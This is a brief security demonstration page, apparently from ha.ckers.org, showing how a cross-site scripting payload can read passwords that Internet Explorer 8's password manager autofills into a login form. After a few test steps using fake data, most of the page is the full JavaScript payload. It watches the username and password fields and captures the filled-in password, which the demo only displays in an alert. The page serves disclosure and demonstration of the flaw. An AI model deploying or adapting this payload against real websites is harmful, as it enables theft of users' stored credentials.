XSS demo for stealing passwords from the IE8 password manager

Similar technique may work for Firefox, Safari, Chrome, Opera, etc. Your mileage may vary.

This is also a demo for stealing html from http://ha.ckers.org/weird/xss-password-manager.html ;)

1. Save a username / password in IE8's password manager by filling out the form below with fake data.

2. Clicking "Yes" when asked.

3. Then click back.

If successful, after inserting your fake username, the alert box should show your password.

THE XSS EXPLOIT PAYLOAD <script> var uL = 0; var usingPasswordManager = 0; // This checks if the user is writing his password entirely or only pressing // the first letter and later selecting the user name from the list. // It will not work if the user writes all the chars of his username. function checkFirstUse() { if((uL + 1 != u.value.length) && usingPasswordManager == 0) usingPasswordManager = 1; else uL++; } function doWhateverYouWantWithThePasswordNow() { if(usingPasswordManager == 1) { alert(document.login.thePassword.value); // We only need the password one time ;) p.detachEvent('onpropertychange',doWhateverYouWantWithThePasswordNow); } } function userIsWritingHisPassword() { u.detachEvent('onpropertychange',checkFirstUse); } var u = document.login.theUser; var p = document.login.thePassword; p.attachEvent('onpropertychange',doWhateverYouWantWithThePasswordNow); u.attachEvent('onpropertychange',checkFirstUse); p.attachEvent('onclick',userIsWritingHisPassword); </script>